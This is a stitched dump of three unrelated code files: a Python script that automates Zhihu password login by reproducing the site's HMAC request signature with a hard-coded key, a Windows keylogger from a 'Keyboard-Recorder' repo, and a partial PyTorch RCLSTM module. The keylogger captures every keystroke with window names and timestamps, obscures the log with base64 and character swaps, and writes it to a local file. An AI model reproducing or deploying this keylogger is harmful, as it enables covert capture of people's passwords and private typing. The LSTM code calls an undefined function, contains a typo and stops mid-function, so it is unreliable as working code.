# 重点信息: authorization
post_headers_raw = b'''
accept:application/json, text/plain, */*
Accept-Encoding:gzip, deflate, br
Accept-Language:zh-CN,zh;q=0.9,zh-TW;q=0.8
authorization:oauth c3cef7c66a1843f8b3a9e6a1e3160e20
Connection:keep-alive
DNT:1
Host:www.zhihu.com
Origin:https://www.zhihu.com
Referer:https://www.zhihu.com/signup?next=%2F
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
'''
def is_login():
# 通过个人中心页面返回状态码来判断是否为登录状态
inbox_url = "https://www.zhihu.com/question/56250357/answer/148534773"
response = s.get(inbox_url, headers=getheaders(), allow_redirects=False)
if response.status_code != 200:
return False
else:
return True
# 拼凑出完整头部:uuid和xsrf都是重要信息
def getheaders():
# 从网页源代码内解析出 uuid与Xsrftoken
z1 = s.get('https://www.zhihu.com/')
sel = Selector(z1.text)
jsdata = sel.css('div#data::attr(data-state)').extract_first()
xudid = json.loads(jsdata)['token']['xUDID']
print(xudid)
xsrf = json.loads(jsdata)['token']['xsrf']
print(xsrf)
headers = headers_raw_to_dict(post_headers_raw)
headers['X-UDID'] = xudid
headers['X-Xsrftoken'] = xsrf
return headers
# 获取payload数据
def getdata(username, password, captcha=''):
client_id = 'c3cef7c66a1843f8b3a9e6a1e3160e20'
timestamp = int(time.time()) * 1000
t = str(int(time.time() * 1000))
js1 = execjs.compile("""
function a(e, t, n) {
var r, o, a, i, c, s, u, l, y, b = 0,
g = [],
w = 0,
E = !1,
_ = [],
O = [],
C = !1,
T = !1;
if (n = n || {}, r = n.encoding || "UTF8", y = n.numRounds || 1, a = v(t, r), y !== parseInt(y, 10) || 1 > y) throw Error("numRounds must a integer >= 1");
if ("SHA-1" === e) c = 512, s = q, u = H, i = 160, l = function (e) {
return e.slice()
};
else if (0 === e.lastIndexOf("SHA-", 0))
if (s = function (t, n) {
return V(t, n, e)
}, u = function (t, n, r, o) {
var a, i;
if ("SHA-224" === e || "SHA-256" === e) a = 15 + (n + 65 >>> 9 << 4), i = 16;
else {
if ("SHA-384" !== e && "SHA-512" !== e) throw Error("Unexpected error in SHA-2 implementation");
a = 31 + (n + 129 >>> 10 << 5), i = 32
}
for (; t.length <= a;) t.push(0);
for (t[n >>> 5] |= 128 << 24 - n % 32, n += r, t[a] = 4294967295 & n, t[a - 1] = n / 4294967296 | 0, r = t.length, n = 0; n < r; n += i) o = V(t.slice(n, n + i), o, e);
if ("SHA-224" === e) t = [o[0], o[1], o[2], o[3], o[4], o[5], o[6]];
else if ("SHA-256" === e) t = o;
else if ("SHA-384" === e) t = [o[0].a, o[0].b, o[1].a, o[1].b, o[2].a, o[2].b, o[3].a, o[3].b, o[4].a, o[4].b, o[5].a, o[5].b];
else {
if ("SHA-512" !== e) throw Error("Unexpected error in SHA-2 implementation");
t = [o[0].a, o[0].b, o[1].a, o[1].b, o[2].a, o[2].b, o[3].a, o[3].b, o[4].a, o[4].b, o[5].a, o[5].b, o[6].a, o[6].b, o[7].a, o[7].b]
}
return t
}, l = function (e) {
return e.slice()
}, "SHA-224" === e) c = 512, i = 224;
else if ("SHA-256" === e) c = 512, i = 256;
else if ("SHA-384" === e) c = 1024, i = 384;
else {
if ("SHA-512" !== e) throw Error("Chosen SHA variant is not supported");
c = 1024, i = 512
} else {
if (0 !== e.lastIndexOf("SHA3-", 0) && 0 !== e.lastIndexOf("SHAKE", 0)) throw Error("Chosen SHA variant is not supported");
var S = 6;
if (s = G, l = function (e) {
var t, n = [];
for (t = 0; 5 > t; t += 1) n[t] = e[t].slice();
return n
}, "SHA3-224" === e) c = 1152, i = 224;
else if ("SHA3-256" === e) c = 1088, i = 256;
else if ("SHA3-384" === e) c = 832, i = 384;
else if ("SHA3-512" === e) c = 576, i = 512;
else if ("SHAKE128" === e) c = 1344, i = -1, S = 31, T = !0;
else {
if ("SHAKE256" !== e) throw Error("Chosen SHA variant is not supported");
c = 1088, i = -1, S = 31, T = !0
}
u = function (e, t, n, r, o) {
n = c;
var a, i = S,
s = [],
u = n >>> 5,
l = 0,
f = t >>> 5;
for (a = 0; a < f && t >= n; a += u) r = G(e.slice(a, a + u), r), t -= n;
for (e = e.slice(a), t %= n; e.length < u;) e.push(0);
for (a = t >>> 3, e[a >> 2] ^= i << 24 - a % 4 * 8, e[u - 1] ^= 128, r = G(e, r); 32 * s.length < o && (e = r[l % 5][l / 5 | 0], s.push((255 & e.b) << 24 | (65280 & e.b) << 8 | (16711680 & e.b) >> 8 | e.b >>> 24), !(32 * s.length >= o));) s.push((255 & e.a) << 24 | (65280 & e.a) << 8 | (16711680 & e.a) >> 8 | e.a >>> 24), 0 == 64 * (l += 1) % n && G(null, r);
return s
}
}
o = F(e), this.setHMACKey = function (t, n, a) {
var l;
if (!0 === E) throw Error("HMAC key already set");
if (!0 === C) throw Error("Cannot set HMAC key after calling update");
if (!0 === T) throw Error("SHAKE is not supported for HMAC");
if (r = (a || {}).encoding || "UTF8", n = v(n, r)(t), t = n.binLen, n = n.value, l = c >>> 3, a = l / 4 - 1, l < t / 8) {
for (n = u(n, t, 0, F(e), i); n.length <= a;) n.push(0);
n[a] &= 4294967040
} else if (l > t / 8) {
for (; n.length <= a;) n.push(0);
n[a] &= 4294967040
}
for (t = 0; t <= a; t += 1) _[t] = 909522486 ^ n[t], O[t] = 1549556828 ^ n[t];
o = s(_, o), b = c, E = !0
}, this.update = function (e) {
var t, n, r, i = 0,
u = c >>> 5;
for (t = a(e, g, w), e = t.binLen, n = t.value, t = e >>> 5, r = 0; r < t; r += u) i + c <= e && (o = s(n.slice(r, r + u), o), i += c);
b += i, g = n.slice(i >>> 5), w = e % c, C = !0
}, this.getHash = function (t, n) {
var r, a, c, s;
if (!0 === E) throw Error("Cannot call getHash after setting HMAC key");
if (c = m(n), !0 === T) {
if (-1 === c.shakeLen) throw Error("shakeLen must be specified in options");
i = c.shakeLen
}
switch (t) {
case "HEX":
r = function (e) {
return f(e, i, c)
};
break;
case "B64":
r = function (e) {
return p(e, i, c)
};
break;
case "BYTES":
r = function (e) {
return d(e, i)
};
break;
case "ARRAYBUFFER":
try {
a = new ArrayBuffer(0)
} catch (e) {
throw Error("ARRAYBUFFER not supported by this environment")
}
r = function (e) {
return h(e, i)
};
break;
default:
throw Error("format must be HEX, B64, BYTES, or ARRAYBUFFER")
}
for (s = u(g.slice(), w, b, l(o), i), a = 1; a < y; a += 1) !0 === T && 0 != i % 32 && (s[s.length - 1] &= 4294967040 << 24 - i % 32), s = u(s, i, 0, F(e), i);
return r(s)
}, this.getHMAC = function (t, n) {
var r, a, v, y;
if (!1 === E) throw Error("Cannot call getHMAC without first setting HMAC key");
switch (v = m(n), t) {
case "HEX":
r = function (e) {
return f(e, i, v)
};
break;
case "B64":
r = function (e) {
return p(e, i, v)
};
break;
case "BYTES":
r = function (e) {
return d(e, i)
};
break;
case "ARRAYBUFFER":
try {
r = new ArrayBuffer(0)
} catch (e) {
throw Error("ARRAYBUFFER not supported by this environment")
}
r = function (e) {
return h(e, i)
};
break;
default:
throw Error("outputFormat must be HEX, B64, BYTES, or ARRAYBUFFER")
}
return a = u(g.slice(), w, b, l(o), i), y = s(O, F(e)), y = u(a, i, c, y, i), r(y)
}
}
function i(e, t) {
this.a = e, this.b = t
}
function c(e, t, n) {
var r, o, a, i, c, s = e.length;
if (t = t || [0], n = n || 0, c = n >>> 3, 0 != s % 2) throw Error("String of HEX type must be in byte increments");
for (r = 0; r < s; r += 2) {
if (o = parseInt(e.substr(r, 2), 16), isNaN(o)) throw Error("String of HEX type contains invalid characters");
for (i = (r >>> 1) + c, a = i >>> 2; t.length <= a;) t.push(0);
t[a] |= o << 8 * (3 - i % 4)
}
return {
value: t,
binLen: 4 * s + n
}
}
function s(e, t, n) {
var r, o, a, i, c = [],
c = t || [0];
for (n = n || 0, o = n >>> 3, r = 0; r < e.length; r += 1) t = e.charCodeAt(r), i = r + o, a = i >>> 2, c.length <= a && c.push(0), c[a] |= t << 8 * (3 - i % 4);
return {
value: c,
binLen: 8 * e.length + n
}
}
function u(e, t, n) {
var r, o, a, i, c, s, u = [],
l = 0,
u = t || [0];
if (n = n || 0, t = n >>> 3, -1 === e.search(/^[a-zA-Z0-9=+\/]+$/)) throw Error("Invalid character in base-64 string");
if (o = e.indexOf("="), e = e.replace(/\=/g, ""), -1 !== o && o < e.length) throw Error("Invalid '=' found in base-64 string");
for (o = 0; o < e.length; o += 4) {
for (c = e.substr(o, 4), a = i = 0; a < c.length; a += 1) r = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".indexOf(c[a]), i |= r << 18 - 6 * a;
for (a = 0; a < c.length - 1; a += 1) {
for (s = l + t, r = s >>> 2; u.length <= r;) u.push(0);
u[r] |= (i >>> 16 - 8 * a & 255) << 8 * (3 - s % 4), l += 1
}
}
return {
value: u,
binLen: 8 * l + n
}
}
function l(e, t, n) {
var r, o, a, i = [],
i = t || [0];
for (n = n || 0, r = n >>> 3, t = 0; t < e.byteLength; t += 1) a = t + r, o = a >>> 2, i.length <= o && i.push(0), i[o] |= e[t] << 8 * (3 - a % 4);
return {
value: i,
binLen: 8 * e.byteLength + n
}
}
function f(e, t, n) {
var r = "";
t /= 8;
var o, a;
for (o = 0; o < t; o += 1) a = e[o >>> 2] >>> 8 * (3 - o % 4), r += "0123456789abcdef".charAt(a >>> 4 & 15) + "0123456789abcdef".charAt(15 & a);
return n.outputUpper ? r.toUpperCase() : r
}
function p(e, t, n) {
var r, o, a, i = "",
c = t / 8;
for (r = 0; r < c; r += 3)
for (o = r + 1 < c ? e[r + 1 >>> 2] : 0, a = r + 2 < c ? e[r + 2 >>> 2] : 0, a = (e[r >>> 2] >>> 8 * (3 - r % 4) & 255) << 16 | (o >>> 8 * (3 - (r + 1) % 4) & 255) << 8 | a >>> 8 * (3 - (r + 2) % 4) & 255, o = 0; 4 > o; o += 1) i += 8 * r + 6 * o <= t ? "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(a >>> 6 * (3 - o) & 63) : n.b64Pad;
return i
}
function d(e, t) {
var n, r, o = "",
a = t / 8;
for (n = 0; n < a; n += 1) r = e[n >>> 2] >>> 8 * (3 - n % 4) & 255, o += String.fromCharCode(r);
return o
}
function h(e, t) {
var n, r = t / 8,
o = new ArrayBuffer(r);
for (n = 0; n < r; n += 1) o[n] = e[n >>> 2] >>> 8 * (3 - n % 4) & 255;
return o
}
function m(e) {
var t = {
outputUpper: !1,
b64Pad: "=",
shakeLen: -1
};
if (e = e || {}, t.outputUpper = e.outputUpper || !1, !0 === e.hasOwnProperty("b64Pad") && (t.b64Pad = e.b64Pad), !0 === e.hasOwnProperty("shakeLen")) {
if (0 != e.shakeLen % 8) throw Error("shakeLen must be a multiple of 8");
t.shakeLen = e.shakeLen
}
if ("boolean" != typeof t.outputUpper) throw Error("Invalid outputUpper formatting option");
if ("string" != typeof t.b64Pad) throw Error("Invalid b64Pad formatting option");
return t
}
function v(e, t) {
var n;
switch (t) {
case "UTF8":
case "UTF16BE":
case "UTF16LE":
break;
default:
throw Error("encoding must be UTF8, UTF16BE, or UTF16LE")
}
switch (e) {
case "HEX":
n = c;
break;
case "TEXT":
n = function (e, n, r) {
var o, a, i, c, s, u = [],
l = [],
f = 0,
u = n || [0];
if (n = r || 0, i = n >>> 3, "UTF8" === t)
for (o = 0; o < e.length; o += 1)
for (r = e.charCodeAt(o), l = [], 128 > r ? l.push(r) : 2048 > r ? (l.push(192 | r >>> 6), l.push(128 | 63 & r)) : 55296 > r || 57344 <= r ? l.push(224 | r >>> 12, 128 | r >>> 6 & 63, 128 | 63 & r) : (o += 1, r = 65536 + ((1023 & r) << 10 | 1023 & e.charCodeAt(o)), l.push(240 | r >>> 18, 128 | r >>> 12 & 63, 128 | r >>> 6 & 63, 128 | 63 & r)), a = 0; a < l.length; a += 1) {
for (s = f + i, c = s >>> 2; u.length <= c;) u.push(0);
u[c] |= l[a] << 8 * (3 - s % 4), f += 1
} else if ("UTF16BE" === t || "UTF16LE" === t)
for (o = 0; o < e.length; o += 1) {
for (r = e.charCodeAt(o), "UTF16LE" === t && (a = 255 & r, r = a << 8 | r >>> 8), s = f + i, c = s >>> 2; u.length <= c;) u.push(0);
u[c] |= r << 8 * (2 - s % 4), f += 2
}
return {
value: u,
binLen: 8 * f + n
}
};
break;
case "B64":
n = u;
break;
case "BYTES":
n = s;
break;
case "ARRAYBUFFER":
try {
n = new ArrayBuffer(0)
} catch (e) {
throw Error("ARRAYBUFFER not supported by this environment")
}
n = l;
break;
default:
throw Error("format must be HEX, TEXT, B64, BYTES, or ARRAYBUFFER")
}
return n
}
function y(e, t) {
return e << t | e >>> 32 - t
}
function b(e, t) {
return 32 < t ? (t -= 32, new i(e.b << t | e.a >>> 32 - t, e.a << t | e.b >>> 32 - t)) : 0 !== t ? new i(e.a << t | e.b >>> 32 - t, e.b << t | e.a >>> 32 - t) : e
}
function g(e, t) {
return e >>> t | e << 32 - t
}
function w(e, t) {
var n = null,
n = new i(e.a, e.b);
return n = 32 >= t ? new i(n.a >>> t | n.b << 32 - t & 4294967295, n.b >>> t | n.a << 32 - t & 4294967295) : new i(n.b >>> t - 32 | n.a << 64 - t & 4294967295, n.a >>> t - 32 | n.b << 64 - t & 4294967295)
}
function E(e, t) {
return 32 >= t ? new i(e.a >>> t, e.b >>> t | e.a << 32 - t & 4294967295) : new i(0, e.a >>> t - 32)
}
function _(e, t, n) {
return e & t ^ ~e & n
}
function O(e, t, n) {
return new i(e.a & t.a ^ ~e.a & n.a, e.b & t.b ^ ~e.b & n.b)
}
function C(e, t, n) {
return e & t ^ e & n ^ t & n
}
function T(e, t, n) {
return new i(e.a & t.a ^ e.a & n.a ^ t.a & n.a, e.b & t.b ^ e.b & n.b ^ t.b & n.b)
}
function S(e) {
return g(e, 2) ^ g(e, 13) ^ g(e, 22)
}
function k(e) {
var t = w(e, 28),
n = w(e, 34);
return e = w(e, 39), new i(t.a ^ n.a ^ e.a, t.b ^ n.b ^ e.b)
}
function j(e) {
return g(e, 6) ^ g(e, 11) ^ g(e, 25)
}
function P(e) {
var t = w(e, 14),
n = w(e, 18);
return e = w(e, 41), new i(t.a ^ n.a ^ e.a, t.b ^ n.b ^ e.b)
}
function A(e) {
return g(e, 7) ^ g(e, 18) ^ e >>> 3
}
function x(e) {
var t = w(e, 1),
n = w(e, 8);
return e = E(e, 7), new i(t.a ^ n.a ^ e.a, t.b ^ n.b ^ e.b)
}
function I(e) {
return g(e, 17) ^ g(e, 19) ^ e >>> 10
}
function N(e) {
var t = w(e, 19),
n = w(e, 61);
return e = E(e, 6), new i(t.a ^ n.a ^ e.a, t.b ^ n.b ^ e.b)
}
function R(e, t) {
var n = (65535 & e) + (65535 & t);
return ((e >>> 16) + (t >>> 16) + (n >>> 16) & 65535) << 16 | 65535 & n
}
function M(e, t, n, r) {
var o = (65535 & e) + (65535 & t) + (65535 & n) + (65535 & r);
return ((e >>> 16) + (t >>> 16) + (n >>> 16) + (r >>> 16) + (o >>> 16) & 65535) << 16 | 65535 & o
}
function D(e, t, n, r, o) {
var a = (65535 & e) + (65535 & t) + (65535 & n) + (65535 & r) + (65535 & o);
return ((e >>> 16) + (t >>> 16) + (n >>> 16) + (r >>> 16) + (o >>> 16) + (a >>> 16) & 65535) << 16 | 65535 & a
}
function L(e, t) {
var n, r, o;
return n = (65535 & e.b) + (65535 & t.b), r = (e.b >>> 16) + (t.b >>> 16) + (n >>> 16), o = (65535 & r) << 16 | 65535 & n, n = (65535 & e.a) + (65535 & t.a) + (r >>> 16), r = (e.a >>> 16) + (t.a >>> 16) + (n >>> 16), new i((65535 & r) << 16 | 65535 & n, o)
}
function z(e, t, n, r) {
var o, a, c;
return o = (65535 & e.b) + (65535 & t.b) + (65535 & n.b) + (65535 & r.b), a = (e.b >>> 16) + (t.b >>> 16) + (n.b >>> 16) + (r.b >>> 16) + (o >>> 16), c = (65535 & a) << 16 | 65535 & o, o = (65535 & e.a) + (65535 & t.a) + (65535 & n.a) + (65535 & r.a) + (a >>> 16), a = (e.a >>> 16) + (t.a >>> 16) + (n.a >>> 16) + (r.a >>> 16) + (o >>> 16), new i((65535 & a) << 16 | 65535 & o, c)
}
function U(e, t, n, r, o) {
var a, c, s;
return a = (65535 & e.b) + (65535 & t.b) + (65535 & n.b) + (65535 & r.b) + (65535 & o.b), c = (e.b >>> 16) + (t.b >>> 16) + (n.b >>> 16) + (r.b >>> 16) + (o.b >>> 16) + (a >>> 16), s = (65535 & c) << 16 | 65535 & a, a = (65535 & e.a) + (65535 & t.a) + (65535 & n.a) + (65535 & r.a) + (65535 & o.a) + (c >>> 16), c = (e.a >>> 16) + (t.a >>> 16) + (n.a >>> 16) + (r.a >>> 16) + (o.a >>> 16) + (a >>> 16), new i((65535 & c) << 16 | 65535 & a, s)
}
function B(e) {
var t, n = 0,
r = 0;
for (t = 0; t < arguments.length; t += 1) n ^= arguments[t].b, r ^= arguments[t].a;
return new i(r, n)
}
function F(e) {
var t, n = [];
if ("SHA-1" === e) n = [1732584193, 4023233417, 2562383102, 271733878, 3285377520];
else if (0 === e.lastIndexOf("SHA-", 0)) switch (n = [3238371032, 914150663, 812702999, 4144912697, 4290775857, 1750603025, 1694076839, 3204075428], t = [1779033703, 3144134277, 1013904242, 2773480762, 1359893119, 2600822924, 528734635, 1541459225], e) {
case "SHA-224":
break;
case "SHA-256":
n = t;
break;
case "SHA-384":
n = [new i(3418070365, n[0]), new i(1654270250, n[1]), new i(2438529370, n[2]), new i(355462360, n[3]), new i(1731405415, n[4]), new i(41048885895, n[5]), new i(3675008525, n[6]), new i(1203062813, n[7])];
break;
case "SHA-512":
n = [new i(t[0], 4089235720), new i(t[1], 2227873595), new i(t[2], 4271175723), new i(t[3], 1595750129), new i(t[4], 2917565137), new i(t[5], 725511199), new i(t[6], 4215389547), new i(t[7], 327033209)];
break;
default:
throw Error("Unknown SHA variant")
} else {
if (0 !== e.lastIndexOf("SHA3-", 0) && 0 !== e.lastIndexOf("SHAKE", 0)) throw Error("No SHA variants supported");
for (e = 0; 5 > e; e += 1) n[e] = [new i(0, 0), new i(0, 0), new i(0, 0), new i(0, 0), new i(0, 0)]
}
return n
}
function q(e, t) {
var n, r, o, a, i, c, s, u = [];
for (n = t[0], r = t[1], o = t[2], a = t[3], i = t[4], s = 0; 80 > s; s += 1) u[s] = 16 > s ? e[s] : y(u[s - 3] ^ u[s - 8] ^ u[s - 14] ^ u[s - 16], 1), c = 20 > s ? D(y(n, 5), r & o ^ ~r & a, i, 1518500249, u[s]) : 40 > s ? D(y(n, 5), r ^ o ^ a, i, 1859775393, u[s]) : 60 > s ? D(y(n, 5), C(r, o, a), i, 2400959708, u[s]) : D(y(n, 5), r ^ o ^ a, i, 3395469782, u[s]), i = a, a = o, o = y(r, 30), r = n, n = c;
return t[0] = R(n, t[0]), t[1] = R(r, t[1]), t[2] = R(o, t[2]), t[3] = R(a, t[3]), t[4] = R(i, t[4]), t
}
function H(e, t, n, r) {
var o;
for (o = 15 + (t + 65 >>> 9 << 4); e.length <= o;) e.push(0);
for (e[t >>> 5] |= 128 << 24 - t % 32, t += n, e[o] = 4294967295 & t, e[o - 1] = t / 4294967296 | 0, t = e.length, o = 0; o < t; o += 16) r = q(e.slice(o, o + 16), r);
return r
}
function V(e, t, n) {
var r, o, a, c, s, u, l, f, p, d, h, m, v, y, b, g, w, E, B, F, q, H, V, G = [];
if ("SHA-224" === n || "SHA-256" === n) d = 64, m = 1, H = Number, v = R, y = M, b = D, g = A, w = I, E = S, B = j, q = C, F = _, V = W;
else {
if ("SHA-384" !== n && "SHA-512" !== n) throw Error("Unexpected error in SHA-2 implementation");
d = 80, m = 2, H = i, v = L, y = z, b = U, g = x, w = N, E = k, B = P, q = T, F = O, V = K
}
for (n = t[0], r = t[1], o = t[2], a = t[3], c = t[4], s = t[5], u = t[6], l = t[7], h = 0; h < d; h += 1) 16 > h ? (p = h * m, f = e.length <= p ? 0 : e[p], p = e.length <= p + 1 ? 0 : e[p + 1], G[h] = new H(f, p)) : G[h] = y(w(G[h - 2]), G[h - 7], g(G[h - 15]), G[h - 16]), f = b(l, B(c), F(c, s, u), V[h], G[h]), p = v(E(n), q(n, r, o)), l = u, u = s, s = c, c = v(a, f), a = o, o = r, r = n, n = v(f, p);
return t[0] = v(n, t[0]), t[1] = v(r, t[1]), t[2] = v(o, t[2]), t[3] = v(a, t[3]), t[4] = v(c, t[4]), t[5] = v(s, t[5]), t[6] = v(u, t[6]), t[7] = v(l, t[7]), t
}
function G(e, t) {
var n, r, o, a, c = [],
s = [];
if (null !== e)
for (r = 0; r < e.length; r += 2) t[(r >>> 1) % 5][(r >>> 1) / 5 | 0] = B(t[(r >>> 1) % 5][(r >>> 1) / 5 | 0], new i((255 & e[r + 1]) << 24 | (65280 & e[r + 1]) << 8 | (16711680 & e[r + 1]) >>> 8 | e[r + 1] >>> 24, (255 & e[r]) << 24 | (65280 & e[r]) << 8 | (16711680 & e[r]) >>> 8 | e[r] >>> 24));
for (n = 0; 24 > n; n += 1) {
for (a = F("SHA3-"), r = 0; 5 > r; r += 1) c[r] = B(t[r][0], t[r][1], t[r][2], t[r][3], t[r][4]);
for (r = 0; 5 > r; r += 1) s[r] = B(c[(r + 4) % 5], b(c[(r + 1) % 5], 1));
for (r = 0; 5 > r; r += 1)
for (o = 0; 5 > o; o += 1) t[r][o] = B(t[r][o], s[r]);
for (r = 0; 5 > r; r += 1)
for (o = 0; 5 > o; o += 1) a[o][(2 * r + 3 * o) % 5] = b(t[r][o], Q[r][o]);
for (r = 0; 5 > r; r += 1)
for (o = 0; 5 > o; o += 1) t[r][o] = B(a[r][o], new i(~a[(r + 1) % 5][o].a & a[(r + 2) % 5][o].a, ~a[(r + 1) % 5][o].b & a[(r + 2) % 5][o].b));
t[0][0] = B(t[0][0], Y[n])
}
return t
}
function run(e,n){
// e = password,
// n 为时间戳,如1515735045595
//client_id,现在默认为 c3cef7c66a1843f8b3a9e6a1e3160e20
client_id = 'c3cef7c66a1843f8b3a9e6a1e3160e20';
r = new a("SHA-1", "TEXT");
r.setHMACKey("d1b964811afb40118a12068ff74a12f4", "TEXT");
r.update(e);
r.update(client_id);
r.update("com.zhihu.web");
r.update(String(n));
return r.getHMAC("HEX")
}
""")
signature = js1.call('run', 'password', timestamp)
data = {
'client_id': client_id, 'grant_type': 'password',
'timestamp': str(timestamp), 'source': 'com.zhihu.web',
'signature': str(signature), 'username': username,
'password': password, 'captcha': captcha,
'lang': 'en', 'ref_source': 'homepage', 'utm_source': ''
}
return data
# 检查是否需要验证码
def checkcapthca(headers, cn=True):
'检查是否需要验证码,无论需不需要,必须要发一个请求'
if cn:
url = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'
else:
url = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'
headers.pop('X-Xsrftoken')
z = s.get(url, headers=headers)
# print(z.json())
return z.json()
#
# 登录函数
def login(username, password):
username = '<EMAIL>'
password = '<PASSWORD>'
url = 'https://www.zhihu.com/api/v3/oauth/sign_in'
headers = getheaders()
data = getdata(username, password)
checkcapthca(headers)
# multipart_encoder = MultipartEncoder(fieles=data, boundary='----WebKitFormBoundarycGPN1xiTi2hCSKKZ')
# todo:boundary后面的几位数可以随机,现在是固定的
encoder = MultipartEncoder(
data, boundary='-----------------------------41184676334')
headers['Content-Type'] = encoder.content_type
print(encoder)
print(headers)
z2 = s.post(url, headers=headers, data=encoder.to_string(), )
print(z2.json())
print('登录成功')
s.cookies.save()
if __name__ == '__main__':
username = '<EMAIL>'
password = '<PASSWORD>'
login(username, password)
``` |
{
"source": "jinjie412/Keyboard-Recorder",
"score": 2
} |
#### File: Keyboard-Recorder/Beta Testing Version/py-hook V2.py
```python
__author__ = 'cyankw'
import pythoncom
import pyHook
import datetime
import urllib, base64
from multiprocessing import Pool
kll=[]
kll2=[]
oldname = ''
def onKeyboardEvent(event):
# 监听键盘事件
timeNow = datetime.datetime.now()
Now = timeNow.strftime('%H:%M:%S')
wrfile = open(r'd://install22.txt', 'a')
evtname = event.WindowName
global oldname
NAME = "WindowName:%s\n" % event.WindowName
TIME="Time:%s\n" % datetime.datetime.now()
KEY=" Key:%s-%s \n" % (event.Key, Now)
LINE="---------\n"
NAME=base64.encodestring(urllib.quote(NAME))
TIME=base64.encodestring(urllib.quote(TIME))
KEY=base64.encodestring(urllib.quote(KEY))
LINE=base64.encodestring(urllib.quote(LINE))
NAME = NAME.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
KEY = KEY.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
TIME = TIME.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
LINE = LINE.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
while evtname != oldname:
wrfile.write(LINE)
wrfile.write(NAME)
wrfile.write(TIME)
oldname = event.WindowName
print LINE
print NAME
print TIME
wrfile.write(KEY)
print KEY
return True
def main():
# 创建一个“钩子”管理对象
hm = pyHook.HookManager()
# 监听所有键盘事件
hm.KeyDown = onKeyboardEvent
# 设置键盘“钩子”
hm.HookKeyboard()
pythoncom.PumpMessages()
if __name__ == "__main__":
p = Pool(processes=8)
main()
p.close()
p.join()
``` |
{
"source": "jinjieyu/RCLSTM",
"score": 3
} |
#### File: RCLSTM/RCLSTM/rclstm.py
```python
import torch
from torch import nn
# from torch.autograd import Variable
from torch.nn import functional, init
import numpy as np
import random
import math
# generate mask matrix based on uniform distribution
def generate_mask_matrix(shape, connection=1.):
s = np.random.uniform(size=shape)
s_flat = s.flatten()
s_flat.sort()
threshold = s_flat[int(shape[0]*shape[1]*(1-connection))]
super_threshold_indices = s>=threshold
lower_threshold_indices = s<threshold
s[super_threshold_indices] = 1.
s[lower_threshold_indices] = 0.
return s
def generate_weight_mask(shape, connection=1.):
sub_shape = (shape[0], shape[1])
w = []
for _ in range(4):
w.append(generate_mask_matrix(sub_shape, connection))
return np.concatenate(w, axis=1).astype('float32')
class LSTMCell(nn.Module):
"""A basic LSTM cell."""
def __init__(self, input_size, hidden_size):
"""
Most parts are copied from torch.nn.LSTMCell.
"""
super(LSTMCell, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.weight_ih = nn.Parameter(torch.FloatTensor(input_size, 4 * hidden_size))
self.weight_hh = nn.Parameter(torch.FloatTensor(hidden_size, 4 * hidden_size))
self.bias = nn.Parameter(torch.FloatTensor(4 * hidden_size))
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters following the way proposed in the paper.
"""
init.xavier_uniform(self.weight_ih.data, gain=init.calculate_gain('sigmoid'))
init.xavier_uniform(self.weight_hh.data, gain=init.calculate_gain('sigmoid'))
init.constant(self.bias.data, val=0)
def forward(self, input_, hx):
"""
Args:
input_: A (batch, input_size) tensor containing input
features.
hx: A tuple (h_0, c_0), which contains the initial hidden
and cell state, where the size of both states is
(batch, hidden_size).
Returns:
h_1, c_1: Tensors containing the next hidden and cell state.
"""
h_0, c_0 = hx
batch_size = h_0.size(0)
bias_batch = (self.bias.unsqueeze(0).expand(batch_size, *self.bias.size()))
wh_b = torch.addmm(bias_batch, h_0, self.weight_hh)
wi = torch.mm(input_, self.weight_ih)
f, i, o, g = torch.split(wh_b + wi, self.hidden_size, dim=1)
c_1 = torch.sigmoid(f)*c_0 + torch.sigmoid(i)*torch.tanh(g)
h_1 = torch.sigmoid(o) * torch.tanh(c_1)
return h_1, c_1
def __repr__(self):
s = '{name}({input_size}, {hidden_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
class RCLSTMCell(nn.Module):
"""RCLSTM cell"""
def __init__(self, input_size, hidden_size, connectivity, device):
super(RCLSTMCell, self).__init__()
self.device = device
self.input_size = input_size
self.hidden_size = hidden_size
self.connectivity = connectivity
self.mask_wih = torch.FloatTensor(input_size, 4 * hidden_size)
self.mask_whh = torch.FloatTensor(hidden_size, 4 * hidden_size)
self.weight_ih = nn.Parameter(torch.FloatTensor(input_size, 4 * hidden_size))
self.weight_hh = nn.Parameter(torch.FloatTensor(hidden_size, 4 * hidden_size))
self.bias = nn.Parameter(torch.FloatTensor(4 * hidden_size))
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters following the way proposed in the paper.
"""
self.mask_wih = torch.from_numpy(
generate_weight_mask((self.input_size, self.hidden_size), self.connectivity)).to(self.device)
self.mask_whh = torch.from_numpy(
generate_w((self.hidden_size, self.hidden_size), self.connectivity)).to(self.device)
weight_ih_data = init.orthogonal(self.weight_ih.data)
weight_ih_data = weight_ih_data * self.mask_wih.cpu().data
self.weight_ih.data.set_(weight_ih_data)
weight_hh_data = init.orthogonal(self.weight_hh.data)
weight_hh_data = weight_hh_data * self.mask_whh.cpu().data
self.weight_hh.data.set_(weight_hh_data)
# The bias is set to zero.
init.constant(self.bias.data, val=0)
def print_weight(self):
print(self.weight_ih.data.nmupy())
def forward(self, input_, hx):
"""
Args:
input_: A (batch, input_size) tensor containing input
features.
hx: A tuple (h_0, c_0), which contains the initial hidden
and cell state, where the size of both states is
(batch, hidden_size).
Returns:
h_1, c_1: Tensors containing the next hidden and cell state.
"""
h_0, c_0 = hx
batch_size = h_0.size(0)
bias_batch = (self.bias.unsqueeze(0).expand(batch_size, *self.bias.size()))
wh_b = torch.addmm(bias_batch, h_0, self.weight_hh * self.mask_whh)
wi = torch.mm(input_, self.weight_ih * self.mask_wih)
f, i, o, g = torch.split(wh_b + wi, self.hidden_size, dim=1)
